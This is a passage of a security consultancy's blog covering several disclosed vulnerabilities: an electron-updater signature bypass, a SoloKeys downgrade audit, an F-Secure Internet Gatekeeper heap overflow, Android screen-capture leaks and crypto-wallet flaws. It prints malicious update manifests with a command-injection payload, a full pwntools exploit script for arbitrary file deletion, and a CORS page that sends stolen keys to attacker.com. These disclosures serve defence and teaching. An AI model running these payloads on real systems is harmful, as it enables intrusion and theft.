    execFile("powershell.exe", ["-NoProfile", "-NonInteractive", "-InputFormat", "None", "-Command", `Get-AuthenticodeSignature '${tempUpdateFile}' | ConvertTo-Json -Compress`], {
      timeout: 20 * 1000
    }, (error, stdout, stderr) => {
      try {
        if (error != null || stderr) {
          handleError(logger, error, stderr)
          resolve(null)
          return
        }

        const data = parseOut(stdout)
        if (data.Status === 0) {
          const name = parseDn(data.SignerCertificate.Subject).get("CN")!
          if (publisherNames.includes(name)) {
            resolve(null)
            return
          }
        }

        const result = `publisherNames: ${publisherNames.join(" | ")}, raw info: ` + JSON.stringify(data, (name, value) => name === "RawData" ? undefined : value, 2)
        logger.warn(`Sign verification failed, installer signed with incorrect certificate: ${result}`)
        resolve(result)
      }
      catch (e) {
        logger.warn(`Cannot execute Get-AuthenticodeSignature: ${error}. Ignoring signature validation due to unknown error.`)
        resolve(null)
        return
      }
    })

which translates to the following PowerShell command:

powershell.exe -NoProfile -NonInteractive -InputFormat None -Command "Get-AuthenticodeSignature 'C:\Users\<USER>\AppData\Roaming\<vulnerable app name>\__update__\<update name>.exe' | ConvertTo-Json -Compress"

Since the ${tempUpdateFile} variable is provided unescaped to the execFile utility, an attacker could bypass the entire signature verification by triggering a parse error in the script. This can be easily achieved by using a filename containing a single quote and then by recalculating the file hash to match the attacker-provided binary (using shasum -a 512 maliciousupdate.exe | cut -d " " -f1 | xxd -r -p | base64).

For instance, a malicious update definition would look like:

version: 1.2.3
files:
  - url: v’ulnerable-app-setup-1.2.3.exe
  sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZ[...]tkYPEvMxDWgNkb8tPCNZLTbKWcDEOJzfA==
  size: 44653912
path: v'ulnerable-app-1.2.3.exe
sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZr1[...]ZrR5X1kb8tPCNZLTbKWcDEOJzfA==
releaseDate: '2019-11-20T11:17:02.627Z'

When serving a similar latest.yml to a vulnerable Electron app, the attacker-chosen setup executable will be run without warnings. Alternatively, they may leverage the lack of escaping to pull out a trivial command injection:

version: 1.2.3
files:
  - url: v';calc;'ulnerable-app-setup-1.2.3.exe
  sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZ[...]tkYPEvMxDWgNkb8tPCNZLTbKWcDEOJzfA==
  size: 44653912
path: v';calc;'ulnerable-app-1.2.3.exe
sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZr1[...]ZrR5X1kb8tPCNZLTbKWcDEOJzfA==
releaseDate: '2019-11-20T11:17:02.627Z'

From an attacker’s standpoint, it would be more practical to backdoor the installer and then leverage preexisting electron-updater features like isAdminRightsRequired to run the installer with Administrator privileges.

Impact

An attacker could leverage this fail open design to force a malicious update on Windows clients, effectively gaining code execution and persistence capabilities. This could be achieved in several scenarios, such as a service compromise of the update server, or an advanced MITM attack leveraging the lack of certificate validation/pinning against the update server.

Disclosure Timelines

Doyensec contacted the main project maintainer on November 12th, 2019 providing a full description of the vulnerability together with a Proof-of-Concept. After multiple solicitations, on January 7th, 2020 Doyensec received a reply acknowledging the bug but downplaying the risk.

At the same time (November 12th, 2019), we identified and reported this issue to a number of affected popular applications using the vulnerable electron-builder update mechanism on Windows, including:

Wordpress for Desktop - Still vulnerable in v4.7.0
IOTA Trinity Wallet - Auto-updates feature has been disabled for Windows (#2566, #2588)
Alva - Still vulnerable in v0.9.2
MyMonero - Still vulnerable in v1.1.13
Cozy Drive - Still vulnerable in v3.19.0

On February 15th, 2020, we’ve been made aware that the vulnerability discussed in this blog post was discussed on Twitter. On February 24th, 2020, we’ve been informed by the package’s mantainer that the issue was resolved in release v22.3.5. While the patch is mitigating the potential command injection risk, the fail-open condition is still in place and we believe that other attack vectors exist. After informing all affected parties, we have decided to publish our technical blog post to emphasize the risk of using Electron-Builder for software updates.

Mitigations

Despite its popularity, we would suggest moving away from Electron-Builder due to the lack of secure coding practices and responsiveness of the maintainer.

Electron Forge represents a potential well-maintained substitute, which is taking advantage of the built-in Squirrel framework and Electron’s autoUpdater module. Since the Squirrel.Windows doesn’t implement signature validation either, for a robust signature validation on Windows consider shipping the app to the Windows Store or incorporate minisign into the update workflow.

Please note that using Electron-Builder to prepare platform-specific binaries does not make the application vulnerable to this issue as the vulnerability affects the electron-updater submodule only. Updates for Linux and Mac packages are also not affected.

If migrating to a different software update mechanism is not feasible, make sure to upgrade Electron-Builder to the latest version available. At the time of writing, we believe that other attack payloads for the same vulnerable code path still exists in Electron-Builder.

Standard security hardening and monitoring on the update server is important, as full access on such system is required in order to exploit the vulnerability. Finally, enforcing TLS certificate validation and pinning for connections to the update server mitigates the MITM attack scenario.

Credits

This issue was discovered and studied by Luca Carettoni and Lorenzo Stella. We would like to thank Samuel Attard of the ElectronJS Security WG for the review of this blog post.

Security Analysis of the Solo Firmware

2020-02-19T00:00:00+01:00

This blogpost summarizes the result of a cooperation between SoloKeys and Doyensec, and was originally published on SoloKeys blog by Emanuele Cesena. You can download the full security auditing report here.

We engaged Doyensec to perform a security assessment of our firmware, v3.0.1 at the time of testing. During a 10 person/days project, Doyensec discovered and reported 3 vulnerabilities in our firmware. While two of the issues are considered informational, one issue has been rated as high severity and fixed in v3.1.0. The full report is available with all details, while in this post we’d like to give a high level summary of the engagement and findings.

Why a Security Analysis, Why Now?

One of the first requests we received after Solo’s Kickstarter was to run an independent security audit. At the time we didn’t have resources to run it and towards the end of 2019 I even closed the ticket as won’t fix, causing a series of complaints from the community.

Recently, we shared that we’re building a new model of Solo based on a new microcontroller, the NXP LPC55S69, and a new firmware rewritten in Rust (a blog post on the firmware is coming soon). As most of our energies will be spent on the new firmware, we didn’t want the current STM32-based firmware to be abandoned. We’ll keep supporting it, fixing bugs and vulnerabilities, but it’s likely it will receive less attention from the wider community.

Therefore we thought this was a good time for a security analysis.

We asked Doyensec to detail not just their findings but also their process, so that we can re-validate the new firmware in Rust when released. We expect to run another analysis on the new firmware, although there’s no concrete plan yet.

The Major Finding: Downgrade Attack

The security review consisted of a manual source code review and fuzzing of the firmware. One researcher performed the review for 2 weeks from Jan 21 to Jan 31, 2020.

In short, he found a downgrade attack where he was able to “upgrade” a firmware to a previous version, exploiting the ability to upload the firmware in multiple, unordered chunks. Downgrade attacks are generally very sensitive because they allow an attacker to downgrade to a previous version of the firmware and then take advantage of older known vulnerabilities.

Practically speaking, however, running such an attack against a Solo key requires either physical access to the key or -if attempted on a malicious site- an explicit user acknowledgement on the WebAuthn window.

This means that your key is almost certainly safe. In addition, we always recommend upgrading the firmware with our official tools.

Also note that our firmware is digitally signed and this downgrade attack couldn’t bypass our signature verification. Therefore a possible attacker can only install one of our twenty-ish previous releases.

Needless to say, we took the vulnerability very seriously and fixed it immediately.

Anatomy of the Downgrade Attack

This was the incriminated code. And this is the patch, that should help understand what happened.

Solo firmware updates are a binary blob where the last 4 bytes represent the version. When a new firmware is installed on the keys, these bytes are checked to ensure that its version is greater than the currently installed one. The firmware digital signature is also verified, but this is irrelevant as this attack only allows to install older signed releases.

The new firmware is written to the keys in chunks. At every write, a pointer to the last written address is updated, so that eventually it will point to the new version at the end of the firmware. You might see the issue: we were assuming that chunks are written only once and in order, but this was not enforced. The patch fixes the issue by requiring that the chunks are written strictly in ascending order.

As an example, think of running v3.0.1, and take an old firmware - say v3.0.0. Search four bytes in it which, when interpreted as a version number, appear to be greater than v3.0.1. First, send the whole 3.0.0 firmware to the key. The last_written_app_address pointer now correctly points to the end of the firmware, encoding version 3.0.0.

Then, write again the four chosen bytes at their original location. Now last_written_app_address points somewhere in the middle of the firmware, and those 4 bytes are interpreted as a “random” version. It turns out firmware v3.0.0 contains some bytes which can be interpreted as v3.0.37 – boom! Here is a fully working proof-of-concept.

Fuzzing TinyCBOR with AFL

The researcher also integrated AFL (American Fuzzy Lop) and started fuzzing our firmware. Our firmware depends on an external library, tinycbor, for parsing CBOR data. In about 24 hours of execution, the researcher exercised the code with over 100M inputs and found over 4k bogus inputs that are misinterpreted by tinycbor and cause a crash of our firmware. Interestingly, the initial inputs were generated by our FIDO2 testing framework.

The fuzzer will be integrated in our testing toolchain soon. If anyone in the community is interested in fuzzing and would like to contribute by fixing bugs in tinycbor we would be happy to share details and examples.

Summary

In summary, we engaged a security engineering company (Doyensec) to perform a security review of our firmware. You can read the full report for details on the process and the downgrade attack they found. For any additional question or for helping with fuzzing of tinycbor feel free to reach out on Twitter @SoloKeysSec or at hello@solokeys.com.

We would like to thank Doyensec for their help in securing the SoloKeys platform. Please make sure to check their website, and oh, they’re also launching a game soon. Yes, a mobile game with a hacking theme!

Heap Overflow in F-Secure Internet Gatekeeper

2020-02-03T00:00:00+01:00

F-Secure Internet Gatekeeper heap overflow explained

This blog post illustrates a vulnerability we discovered in the F-Secure Internet Gatekeeper application. It shows how a simple mistake can lead to an exploitable unauthenticated remote code execution vulnerability.

Reproduction environment setup

All testing should be reproducible in a CentOS virtual machine, with at least 1 processor and 4GB of RAM.

An installation of F-Secure Internet Gatekeeper will be needed. It used to be possible to download it from https://www.f-secure.com/en/business/downloads/internet-gatekeeper. As far as we can tell, the vendor no longer provides the vulnerable version.

The original affected package has the following SHA256 hash: 1582aa7782f78fcf01fccfe0b59f0a26b4a972020f9da860c19c1076a79c8e26.

Proceed with the installation:

(1) If you’re using an x64 version of CentOS, execute yum install glibc.i686
(2) Install the Internet Gatekeeper binary using rpm -I <fsigkbin>.rpm
(3) For a better debugging experience, install gdb 8+ and https://github.com/hugsy/gef

Now you can use GHIDRA/IDA or your favorite dissassembler/decompiler to start reverse engineering Internet Gatekeeper!

The target

As described by F-Secure, Internet Gatekeeper is a “highly effective and easy to manage protection solution for corporate networks at the gateway level”.

F-Secure Internet Gatekeeper contains an admin panel that runs on port 9012/tcp. This may be used to control all of the services and rules available in the product (HTTP proxy, IMAP proxy, etc.). This admin panel is served over HTTP by the fsikgwebui binary which is written in C. In fact, the whole web server is written in C/C++; there are some references to civetweb, which suggests that a customized version of CivetWeb may be in use.

The fact that it was written in C/C++ lead us down the road of looking for memory corruption vulnerabilities which are usually common in this language.

It did not take long to find the issue described in this blog post by fuzzing the admin panel with Fuzzotron which uses Radamsa as the underlying engine. fuzzotron has built-in TCP support for easily fuzzing network services. For a seed, we extracted a valid POST request that is used for changing the language on the admin panel. This request can be performed by unauthenticated users, which made it a good candidate as fuzzing seed.

When analyzing the input mutated by radamsa we could quickly see that the root cause of the vulnerability revolved around the Content-length header. The generated test that crashed the software had the following header value: Content-Length: 21487483844. This suggests an overflow due to incorrect Integer math.

After running the test through gdb we discovered that the code responsible for the crash lies in the fs_httpd_civetweb_callback_begin_request function. This method is responsible for handling incoming connections and dispatching them to the relevant functions depending on which HTTP verbs, paths or cookies are used.

To demonstrate the issue we’re going to send a POST request to port 9012 where the admin panel is running. We set a very big Content-Length header value.

POST /submit HTTP/1.1
Host: 192.168.0.24:9012
Content-Length: 21487483844

AAAAAAAAAAAAAAAAAAAAAAAAAAA

The application will parse the request and execute the fs_httpd_get_header function to retrieve the content length. Later, the content length is passed to the function strtoul (String to Unsigned Long)

The following pseudo code provides a summary of the control flow:

content_len = fs_httpd_get_header(header_struct, "Content-Length");
if ( content_len ){
   content_len_new = strtoul(content_len_old, 0, 10);
}

What exactly happens in the strtoul function can be understood by reading the corresponding man pages. The return value of strtoul is an unsigned long int, which can have a largest possible value of 2^32-1 (on 32 bit systems).

The strtoul() function returns either the result of the conversion or, if there was a leading minus sign, the negation of the result of the conversion represented as an unsigned value, unless the original (nonnegated) value would overflow; in the latter case, strtoul() returns ULONG_MAX and sets errno to ERANGE. Precisely the same holds for strtoull() (with ULLONG_MAX instead of ULONG_MAX).

As our provided Content-Length is too large for an unsigned long int, strtoul will return the ULONG_MAX value which corresponds to 0xFFFFFFFF on 32 bit systems.

So far so good. Now comes the actual bug. When the fs_httpd_civetweb_callback_begin_request function tries to issue a malloc request to make room for our data, it first adds 1 to the content_length variable and then calls malloc.

This can be seen in the following pseudo code:

// fs_malloc == malloc
data_by_post_on_heap = fs_malloc(content_len_new + 1)

This causes a problem as the value 0xFFFFFFFF + 1 will cause an integer overflow, which results in 0x00000000. So the malloc call will allocate 0 bytes of memory.

Malloc does allow invocations with a 0 bytes argument. When malloc(0) is called a valid pointer to the heap will be returned, pointing to an allocation with the minimum possible chunk size of 0x10 bytes. The specifics can be also read in the man pages:

The malloc() function allocates size bytes and returns a pointer to the allocated memory. The memory is not initialized. If size is 0, then malloc() returns either NULL, or a unique pointer value that can later be successfully passed to free().

If we go a bit further down in the Internet Gatekeeper code, we can see a call to mg_read.

// content_len_new is without the addition of 0x1.
// so content_len_new == 0xFFFFFFFF
if(content_len_new){
    int bytes_read = mg_read(header_struct, data_by_post_on_heap, content_len_new)
}

During the overflow, this code will read an arbitrary amount of data onto the heap - without any restraints. For exploitation, this is a great primitive since we can stop writing bytes to the HTTP stream and the software will simply shut the connection and continue. Under these circumstances, we have complete control over how many bytes we want to write.

In summary, we can leverage Malloc’s chunks of size 0x10 with an overflow of arbitrary data to override existing memory structures. The following proof of concept demonstrates that. Despite being very raw, it exploits an existing struct on the heap by flipping a flag to should_delete_file = true, and then subsequently spraying the heap with the full path of the file we want to delete. Internet Gatekeeper internal handler has a decontruct_http method which looks for this flag and removes the file. By leveraging this exploit, an attacker gains arbitrary file removal which is sufficient to demonstrate the severity of the issue.

from pwn import *
import time
import sys



def send_payload(payload, content_len=21487483844, nofun=False):
    r = remote(sys.argv[1], 9012)
    r.send("POST / HTTP/1.1\n")
    r.send("Host: 192.168.0.122:9012\n")
    r.send("Content-Length: {}\n".format(content_len))
    r.send("\n")
    r.send(payload)
    if not nofun:
        r.send("\n\n")
    return r


def trigger_exploit():
    print "Triggering exploit"
    payload = ""
    payload += "A" * 12             # Padding
    payload += p32(0x1d)            # Fast bin chunk overwrite
    payload += "A"* 488             # Padding
    payload += p32(0xdda00771)      # Address of payload
    payload += p32(0xdda00771+4)    # Junk
    r = send_payload(payload)



def massage_heap(filename):
        print "Trying to massage the heap....."
        for x in xrange(100):
            payload = ""
            payload += p32(0x0)             # Needed to bypass checks
            payload += p32(0x0)             # Needed to bypass checks
            payload += p32(0xdda0077d)      # Points to where the filename will be in memory
            payload += filename + "\x00"
            payload += "C"*(0x300-len(payload))
            r = send_payload(payload, content_len=0x80000, nofun=True)
            r.close()
            cut_conn = True
        print "Heap massage done"


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print "Usage: ./{} <victim_ip> <file_to_remove>".format(sys.argv[0])
        print "Run `export PWNLIB_SILENT=1` for disabling verbose connections"
        exit()
    massage_heap(sys.argv[2])
    time.sleep(1)
    trigger_exploit()
    print "Exploit finished. {} is now removed and remote process should be crashed".format(sys.argv[2])

Current exploit reliability is around 60-70% of the total attempts, and our exploit PoC relies on the specific machine as listed in the prerequisites.

Gaining RCE should definitely be possible as we can control the exact chunk size and overwrite as much data as we’d like on small chunks. Furthermore, the application uses multiple threads which can be leveraged to get into clean heap arenas and attempt exploitation multiple times. If you’re interested in working with us, email your RCE PoC to info@doyensec.com ;)

This critical issue was tracked as FSC-2019-3 and fixed in F-Secure Internet Gatekeeper versions 5.40 – 5.50 hotfix 8 (2019-07-11). We would like to thank F-Secure for their cooperation.

Resources for learning about heap exploitation

Exploit walkthroughs

GLibC walkthroughs

Tools

GEF - Add-on for GDB to assist exploitation. Also, it has some useful commands for heap exploits debugging
Villoc - Visual representation of the heap in HTML

Internship at Doyensec

2019-11-05T00:00:00+01:00

“Our moral responsibility is not to stop the future, but to shape it…” — Alvin Toffler

At Doyensec, we feel responsible for what the future of information security will look like. We want a safe and open Internet and we believe that hackers play an important role. As a part of our give back strategy, we want to find ways of transferring our knowledge to new generations.

Doyensec interns work alongside experienced security researchers during live customer engagements. They receive full time support from senior staff members and are encouraged to explore individual research projects. Additionally, they are included in all team meetings so they can learn and share in the different experiences arising from our work. In short, we want to provide a comprehensive experience on what it means to be a first-class security consultant in the vulnerability research space.

The internship program @Doyensec represents an opportunity to learn new infosec skills. We also hope it becomes a memorable personal experience. It lasts 2-3 months and is a mix of remote and in-person interactions.

We offer each candidate a transparent recruitment process in 3 simple steps:

1) Introductory call to understand one’s motivation for applying and their availability over the upcoming months
2) Online challenges to evaluate technical skillset (web security testing)
3) Final call to discuss details

Day 1

Day one is important. Interns will be responsible for setting up their Doyensec provided machine and will be introduced to the team. They will be assigned to a senior security researcher who will be at their disposal and act as mentor throughout the entire internship. They will learn how we schedule projects, communicate, and cooperate to ensure complete coverage during our testing activities. We will provide them with all necessary equipment to perform the work. Most importantly, they will learn about our values and things that we consider crucial for delivering high quality work.

Time allocation

While the internship is considered full time over the course of 2/3 months, we did have interns who were still studying and wanted to combine both work and school. We take pride in having a flexible company culture oriented around results and our approach to the internship is no different.

“For knowledge work, time spent has little to do with value created and the forty hour workweek is anachronistic nonsense.” — Naval Ravikant @naval

Work days are generally grouped into two categories:

a) Customer projects. Interns work on real-life projects. Whenever possible, we will try to match personal interest and skillset with tasks when allocating projects.

b) Research time. We strongly believe in research and practice, therefore we allow interns to spend 50% of their time on research topics. We will define goals together and provide guidance and feedback on the progress.

Testimonial

Mohamed Ouad is a student of computer science at the University of Milan. In the fall of 2018 he joined Doyensec as our second intern. We asked him a few questions to summarize his experience:

What did you learn during your internship?
“During this period I had the possibility to learn a lot of things, and not just technical stuff. For instance, I understood how to explain findings to non-technical audience and manage projects with strict deadlines.”

Have you improved your skillset?
“Definitely! I improved my knowledge of Android security and got interested in Google Chrome extensions security, static code review and Electron-based apps security.”

Will the internship have an impact on your career?
“This experience has given me a huge added value to my career path. I’ve not only learned a lot, but also created an important item in my curriculum that will be certainly useful for future opportunities. I suggest this “adventure” to everyone!”

More information on our internship program

The Doyensec internship program is open to students returning to full-time education for at least one semester. We accept candidates with residency in either US or Europe.

What do we offer:

Opportunity to perform professional security testing for both start ups and Fortune 500 companies
Ability to perform cutting-edge offensive research projects
Feedback and guidance
Attractive financial compensation

What do we expect from candidates?

Our perfect candidate:

Has already some experience with manual source code review and Burp Suite / OWASP ZAP
Learns quickly
Should be able to prepare reports in English
Is self-organized
Is able to learn from his/her mistakes
Has motivation to work/study and show initiative
Must be communicative (without this it is difficult to teach effectively)
Brings something to the mix (e.g. creativity, academic knowledge, etc.)

In contrast to full-time positions (we are always hiring web and mobile pentesters!), a good attitude is the most important factor we are looking for.

Do you want to join Doyensec as an intern? Apply via our careers portal!

One Bug To Rule Them All: Modern Android Password Managers and FLAG_SECURE Misuse

2019-08-22T00:00:00+02:00

A few months ago I stumbled upon a 2016 blog post by Mark Murphy, warning about the state of FLAG_SECURE window leaks in Android. This class of vulnerabilities has been around for a while, hence I wasn’t confident that I could still leverage the same weakness in modern Android applications. As it often turns out, I was being too optimistic. After a brief survey, I discovered that the issue still persists today in many password manager applications (and others).

The problem

The FLAG_SECURE setting was initially introduced as an additional setting to WindowManager.LayoutParams to prevent DRM-protected content from appearing in screenshots, video screencaps or from being viewed on “non-secure displays”.

This last term was created to distinguish between virtual screens created by the MediaProjection API (a native API to capture screen contents) and physical display devices like TV screens (having a DRM-secure video output). In this way Google forestalled the piracy apps issue by preventing unsigned apps from creating virtual “secure” displays, only allowing casting to physical “secure” devices.
While FLAG_SECURE nowadays serves its original purpose well (to the delight of e.g. Netflix, Google Play Movies, Youtube Red), developers during the years mistook this “secure” flag as an easy catch-all security feature provided by Android to mark the entire app from being excepted from a screen capture or recording.

Unfortunately, this functionality is not global for the entire app, but can only be set on specific screens that contain sensitive data. To make matters worse, every Android fragment used in the application will not respect the FLAG_SECURE set for the activity and won’t pass down the flag to any other Window instances created on behalf of that activity. As a consequence of this, several native UI components like Spinner,Toast,Dialog,PopupWindow and many others will still leak their content to third party applications having the right permissions.

The approach

After a short survey, I decided to investigate a category of apps in which a content leak would have had the biggest impact: mobile password managers. This would also be the category of applications a generic attacker would probably choose to target first, along with banking apps.
With this in mind, I fired up a screen capture application (mnml) and started poking around. After a few days of testing, every Android password manager examined (4) was found to be vulnerable to some extent.

The following sections provide a summary of the discovered issues. All vulnerabilities were disclosed to the vendors throughout the second week of May 2019.

1Password

In 1Password, the Account Settings’ section offers a way to manage 1Password accounts. One of the functionalities is “Large Type”, which allows showing an account’s Secret Key in a large, easy-to-read format. The fragment showing the Secret Key leaks the generated password to third-party applications installed on the victim’s device. The Secret Key is combined with the user’s Master Password to create the full encryption key used to encrypt the accounts data, protecting them on the server side.

This was fixed in 1Password for Android in version 7.1.5, which was released on May 29, 2019.

Keeper

When a user taps the password field, Keeper shows a “Copied to Clipboard” toast. But if the user shows the cleartext password with the “Eye” icon, the toast will also contain the secret cleartext password. This fragment showing the copied password leaks the password to third-party applications.

This was fixed in Keeper for Android version 14.3.0, which was released on June 21, 2019. An official advisory was also issued.

Dashlane

Dashlane features a random password generation functionality, usable when an account entry is inserted or edited. Unfortunately, the window responsible for choosing the parameter for the “safe” passwords is visible by third parties applications on the victim’s device.

Note that it is also possible for an attacker to infer the service associated with the leaked password, since the services list and autocomplete fragment is also missing the FLAG_SECURE flag, resulting in its leak.

The issue was fixed in Dashlane for Android in version 6.1929.2.

The attack scenario

Several scenarios would result in an app being installed on a user’s phone recording their activity. These include:

Malicious casting apps requiring record permission, since users usually don’t know that casting apps can also record their screen;
Innocuous-looking apps using Cloak & Dagger attacks;
Malicious app installed through third-party Android app stores or bypassing PHA detection filters of the Play Store;
Malicious app pushed to the smartphone using the Play Store feature in a Man-in-the-Browser attack scenario;

If these scenarios seem unlikely to happen in real life, it is worth noting that there have been several instances of apps abusing this class of attacks in the recent past.

Many thanks to the 1Password, Keeper, and Dashlane security teams that handled the report in a professional way, issued a payout, and allowed the disclosure. Please remember that using a password manager is still the best choice these days to protect your digital accounts and that all the above issues are now fixed.

As always, this research was possible thanks to my 25% research time at Doyensec!

Lessons in auditing cryptocurrency wallets, systems, and infrastructures

2019-08-01T00:00:00+02:00

In the past three years, Doyensec has been providing security testing services for some of the global brands in the cryptocurrency world. We have audited desktop and mobile wallets, exchanges web interfaces, custody systems, and backbone infrastructure components.

We have seen many things done right, but also discovered many design and implementation vulnerabilities. Failure is a great lesson in security and can always be turned into positive teaching for the future. Learning from past mistakes is the key to create better systems.

In this article, we will guide you through a selection of four simple (yet dangerous!) application vulnerabilities.

Breaking Crypto Currency Systems != Breaking Crypto (at least not always)

For that, you would probably need to wait for Jean-Philippe Aumasson’s talk at the upcoming BlackHat Vegas.

This blog post was brought to you by Kevin Joensen and Mateusz Swidniak.

1) CORS Misconfigurations

Cross-Origin Resource Sharing is used for relaxing the Same Origin Policy. This mechanism enables communication between websites hosted on different domains. A misconfigured CORS can have a great impact on the website security posture as other sites might access the page content.

Imagine a website with the following HTTP response headers:

Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true

If an attacker has successfully lured a victim to their website, they can easily issue an HTTP request with a null origin using an iframe tag and a sandbox attribute.

<iframe sandbox="allow-scripts" src="https://attacker.com/corsbug" />

<html>
<body>
<script>
var req = new XMLHttpRequest();
req.onload = callback;
req.open('GET', 'https://bitcoinbank/keys', true);
req.withCredentials = true;
req.send();

function callback() {
    location='https://attacker.com/?dump='+this.responseText;
};
</script>
</body>

When the victim visits the crafted page, the attacker can perform a request to https://bitcoinbank/keys and retrieve their secret keys.

This can also happen when the Access-Control-Allow-Origin response header is dynamically updated to the same domain as specified by the Origin request header.

References:

Checklist:

Ensure that your Access-Control-Allow-Origin is never set to null
Ensure that Access-Control-Allow-Origin is not taken from a user-controlled variable or header
Ensure that you are not dynamically copying the value of the Origin HTTP header into Access-Control-Allow-Origin

2) Asserts and Compilers

In some programming languages, optimizations performed by the compiler can have undesirable results. This could manifest in many different quirks due to specific compiler or language behaviors, however there is a specific class of idiosyncrasies that can have devastating effects.

Let’s consider this Python code as an example:

# All deposits should belong to the same CRYPTO address
assert all([x.deposit_address == address for x in deposits])

At first sight, there is nothing wrong with this code. Yet, there is actually a quite severe bug. The problem is that Python runs with __debug__ by default. This allows for assert statements like the security control illustrated above. When the code gets compiled to optimized byte code (*.pyo files) and lands into production, all asserts are gone. As a result, the application will not enforce any security checks.

Similar behaviors exist in many languages and with different compiler options, including C/C++, Swift, Closure and many more.

For example, let’s consider the following Swift code:

// No assert if password is == mysecret
if (password != "mysecretpw") {
   assertionFailure("Password not correct!")
}

If you were to run this code in Xcode, then it would simply hit your assertionFailure in case of an incorrect password. This is because Xcode compiles the application without any optimizations using the -Onone flag. If you were to build the same code for the Apple Store instead, the check would be optimized out leading to no password check at all since the execution will continue. Note that there are many things wrong in those three lines of code.

Talking about assertions, PHP takes the first place and de-facto facilitates RCE when you run asserts with a string argument. This is due to the argument getting evaluated through the standard eval.

References:

Checklist:

Do not use assert statements for guarding code and enforcing security checks
Research for compiler optimizations gotchas in the language you use

3) Arithmetic Errors

A bug class that is also easy to overlook in fin-tech systems pertains to arithmetic operations. Negative numbers and overflows can create money out of thin air.

For example, let’s consider a withdrawal function that looks for the amount of money in a certain wallet. Being able to pass a negative number could be abused to generate money for that account.

Imagine the following example code:

if data["wallet"].balance < data["amount"]:
    error_dict["wallet_balance"] = ("Withdrawal exceeds available balance")
...    
data["wallet"].balance = data["wallet"].balance - data["amount"]

The if statement correctly checks if the balance is higher than the requested amount. However, the code does not enforce the use of a positive number.

Let’s try with -100 coins in a wallet account having 200 coins.

The check would be satisfied and the code responsible for updating the amount would look like the following:

data["wallet"].balance = 200 - (-100) # 300 coins

This would enable an attacker to get free money out of the system.

Talking about numbers and arithmetic, there are also well-known bugs affecting lower-level languages in which signed vs unsigned types come to play.

In most architectures, a signed short integer is a 2 bytes type that can hold a negative number and a positive number. In memory, positive numbers are represented as 1 == 0x0001, 2 == 0x0002 and so forth. Instead, negative numbers are represented as two’s complement -1 == 0xffff,-2 == 0xfffe and so forth. These representations meet on 0x7fff, which enables a signed integer to hold a value between -32768 and 32767.

Let’s take a look at an example with pseudo-code:

signed short int bank_account = -30000

Assuming the system still allows withdrawals (e.g. perhaps a loan), the following code will be exercised:

int withdraw(signed short int money){
    bank_account -= money
}

As we know, the max negative value is -32768. What happens if a user withdraws 2768 + 1 ?

withdraw(2769); //32767

Yes! No longer in debt thanks to integer wrapping. Current balance is now 32767.

References:

Checklist:

Verify that the transaction systems and other components dealing with financial arithmetic do not accept negative numbers
Verify integer boundaries, and whether correct signed vs unsigned types are used across the entire codebase. Note that the signed integer overflow is considered undefined behavior.

4) Password Reset Token Leakage Via Referer

Last but not least, we would like to introduce a simple infoleak bug. This is a very widespread issue present in the password reset mechanism of many web platforms.

A standard procedure for a password reset in modern web applications involves the use of a secret link sent out to the user via email. The secret is used as an authentication token to prove that the recipient had access to the email associated with the user’s registration.

Those links typically take the form of https://example.com/passwordreset/2a8c5d7e-5c2c-4ea6-9894-b18436ea5320 or https://example.com/passwordreset?token=2a8c5d7e-5c2c-4ea6-9894-b18436ea5320.

But what actually happens when the user clicks the link?

When a web browser requests a resource, it typically adds an HTTP header, called the Referer header indicating the URL of the resource from which the request originated. If the resource being requested resides on a different domain, the Referer header is still generally included in the cross-domain request. It is not uncommon that the password reset page loads external JavaScript resources such as libraries and tracking code. Under those circumstances, the password reset token will be also sent to the 3rd-party domains.

GET /libs/jquery.js HTTP/1.1
Host: 3rdpartyexampledomain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Referer: https://example.com/passwordreset/2a8c5d7e-5c2c-4ea6-9894-b18436ea5320
Connection: close

As a result, personnel working for the affected 3rd-party domains and having access to the web server access logs might be able to take over accounts of the vulnerable web platform.

References:

Checklist:

If possible, applications should never transmit any sensitive information within the URL query string
In case of password reset links, the Referer header should always be removed using one of the following techniques:
- Blank landing page under the web platform domain, followed by a redirect
- Originate the navigation from a pseudo-URL document, such as data: or javascript:
- Using <iframe src=about:blank>
- Using <meta name="referrer" content="no-referrer" />
- Setting an appropriate Referrer-Policy header, assuming your application supports recent browsers only

If you would like to talk about securing your platform, contact us at info@doyensec.com!

Jackson gadgets - Anatomy of a vulnerability

2019-07-22T00:00:00+02:00

Jackson CVE-2019-12384: anatomy of a vulnerability class

During one of our engagements, we analyzed an application which used the Jackson library for deserializing JSONs. In that context, we have identified a deserialization vulnerability where we could control the class to be deserialized. In this article, we want to show how an attacker may leverage this deserialization vulnerability to trigger attacks such as Server-Side Request Forgery (SSRF) and remote code execution.

This research also resulted in a new CVE-2019-12384 and a bunch of RedHat products affected by it:

What is required?

As reported by Jackson’s author in On Jackson CVEs: Don’t Panic — Here is what you need to know the requirements for a Jackson “gadget” vulnerability are:

(1) The application accepts JSON content sent by an untrusted client (composed either manually or by a code you did not write and have no visibility or control over) — meaning that you can not constrain JSON itself that is being sent
(2) The application uses polymorphic type handling for properties with nominal type of java.lang.Object (or one of small number of “permissive” tag interfaces such as java.util.Serializable, java.util.Comparable)
(3) The application has at least one specific “gadget” class to exploit in the Java classpath. In detail, exploitation requires a class that works with Jackson. In fact, most gadgets only work with specific libraries — e.g. most commonly reported ones work with JDK serialization
(4) The application uses a version of Jackson that does not (yet) block the specific “gadget” class. There is a set of published gadgets which grows over time so it is a race between people finding and reporting gadgets and the patches. Jackson operates on a blacklist. The deserialization is a “feature” of the platform and they continually update a blacklist of known gadgets that people report.

In this research we assumed that the preconditions (1) and (2) are satisfied. Instead, we concentrated on finding a gadget that could meet both (3) and (4). Please note that Jackson is one of the most used deserialization frameworks for Java applications where polymorphism is a first-class concept. Finding these conditions comes at zero-cost to a potential attacker who may use static analysis tools or other dynamic techniques, such as grepping for @class in request/responses, to find these targets.

Preparing for the battlefield

